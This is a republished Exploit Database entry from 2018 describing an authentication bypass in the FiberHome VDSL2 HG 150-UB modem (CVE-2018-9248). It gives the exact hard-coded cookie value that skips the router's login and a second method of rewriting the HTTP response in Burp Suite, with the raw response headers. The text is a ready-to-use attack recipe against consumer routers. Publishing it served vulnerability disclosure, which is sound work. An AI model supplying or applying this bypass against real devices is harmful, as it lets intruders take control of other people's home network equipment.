FiberHome VDSL2 Modem HG 150-UB – Authentication Bypass

• Exploit Database
• 133 阅读

• 作者： Noman Riffat
  日期： 2018-04-06
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/44413/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  # Exploit Title: FiberHome VDSL2 Modem HG 150-UB Authentication Bypass # Date: 04/03/2018 # Exploit Author: Noman Riffat # Vendor Homepage: http://www.fiberhome.com/ # CVE : CVE-2018-9248, CVE-2018-9248   The vulnerability exists in plain text & hard coded cookie. Using any cookie manager extension, an attacker can bypass login page by setting the following Master Cookie.   Cookie: Name=0admin   Then access the homepage which will no longer require authentication. http://192.168.10.1/   Due to improper session implementation, there is another way to bypass login. The response header of homepage without authentication looks like this.   HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close   <html><head><script language=&apos;javascript&apos;> parent.location=&apos;login.html&apos; </script></head><body></body></html>HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Content-Type: text/html Connection: close   <html> <head> .. continue to actual homepage source   The response header looks totally messed up and by triggering burp suite and modifying it to following will grant access to homepage without authentication.   HTTP/1.1 200 Ok Server: micro_httpd Cache-Control: no-cache Date: Tue, 03 Apr 2018 18:33:12 GMT Set-Cookie: Name=; path=/ Content-Type: text/html Connection: close   <html> <head> .. continue to actual homepage source